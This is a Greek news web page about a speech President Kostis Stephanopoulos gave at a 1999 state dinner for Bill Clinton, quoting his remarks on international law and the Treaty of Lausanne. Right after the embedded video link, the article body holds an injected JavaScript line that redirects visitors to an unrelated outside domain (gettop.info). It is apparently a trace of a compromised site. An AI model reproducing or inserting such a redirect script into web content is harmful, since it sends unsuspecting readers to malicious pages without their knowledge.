Όταν ο Κωστής Στεφανόπουλος «την είπε» στον Μπιλ Κλίντον (ΒΙΝΤΕΟ)

0
9

 

Στην ομιλία που απηύθυνε κατά το επίσημο δείπνο το οποίο παρέθεσε στο Προεδρικό Μέγαρο ο εκλιπών Κωστής Στεφανόπουλος στις 19-11-1999, ανέφερε εκ μέρους των Ελλήνων όσα αυτοί θα ήθελαν να πουν στον Πρόεδρο των ΗΠΑ, αλλά δεν μπορούσαν.

Από την αρχή ως το τέλος της η ομιλία του Κωστή Στεφανόπουλου είναι ενα μήνυμα προς τις ΗΠΑ. Το σημείο ειδικότερα που αναφέρεται στο διεθνές δίκαιο και τη Συνθήκη της Λωζάννης κάνει ακόμη πιο επίκαιρη την ομιλία του εκλιπόντα: Η διεθνής κοινότης γνωρίζει πολύ καλά τας διατάξεις του διεθνούς δικαίου και των διεθνών συνθηκών. Γνωρίζει το Δίκαιον της Θαλάσσης, γνωρίζει τις ρυθμίσεις της Συνθήκης της Λωζάννης, όπως γνωρίζει και τα άρθρα των πρωτοκόλλων που υπεγράφησαν μεταξύ Τουρκίας και Ιταλίας για τα Δωδεκάνησα.

Η διεθνής κοινότης γνωρίζουσα όλα αυτά και μη λαμβάνουσα θέση, φοβούμαι ότι άθελά της ενισχύει τις αβάσιμες διεκδικήσεις και τις επιθετικές διαθέσεις. Η Ελλάς δεν ζητεί από κανένα να μεσολαβήσει υπέρ αυτής, επικαλείται απλώς το δίκαιον και τη νομιμότητα, διότι πιστεύει ότι βασικό στοιχείο του πολιτισμού μας δεν είναι τόσον η στήριξη των πάσης φύσεως συμφερόντων μας, όσον η στήριξη της νομιμότητος. Ορθότερο θα ήτο αν έλεγα ότι πρωταρχικό συμφέρον όλων είναι η υπεράσπιση της νομιμότητος.{…}

https://youtu.be/5Jws-J2bRng setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here